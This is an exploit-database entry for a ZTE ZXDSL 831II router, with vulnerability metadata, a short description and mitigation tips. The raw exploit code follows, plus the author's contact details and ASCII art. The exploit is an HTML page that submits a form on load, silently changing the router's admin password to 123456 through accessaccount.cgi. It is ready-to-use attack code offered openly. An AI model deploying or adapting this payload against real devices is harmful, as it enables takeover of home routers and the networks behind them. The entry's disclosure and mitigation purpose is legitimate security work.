ZTE Change admin password

vendor:

by:

Nuevo Asesino

5.5

CVSS

MEDIUM

Change admin password

284

CWE

Product Name:

Affected Version From: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

This exploit allows an attacker to change the admin password of a ZTE device. The attacker can submit a POST request to the accessaccount.cgi endpoint with the new password as a parameter. This can be done using the provided form in the HTML code.

Mitigation:

To mitigate this vulnerability, users should ensure that their ZTE devices are running the latest firmware version. Additionally, it is recommended to change the default admin password and regularly monitor for any unauthorized changes.

Source

Exploit-DB raw data:

# Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Exploit By Nuevo Asesino </H2>
<form method="POST" name="form0" action="http:\192.168.1.1\accessaccount.cgi?sysPassword=123456">
</form>
</body>
</html> ##################################################################################################                                                                                                  
password ======> 123456
Now you can get the username & the password------------------------------------------------------Contact  :Oeb1590@hotmail.comFacebook : Https:\www.facebook.com\Want.Revenge 
              \|||/           .-.________                (o o)                ________.-.     -----/ \_)_______)  +----------oooO------------+   (_______(_/   \------         (    ()___)         The Blacke Devils               (___()    )               ()__)                                         (__()         ----\___()_)         Algeria Warriors                (_()___/-----                                                            +-------------Ooo----------+                                In:Arab47.com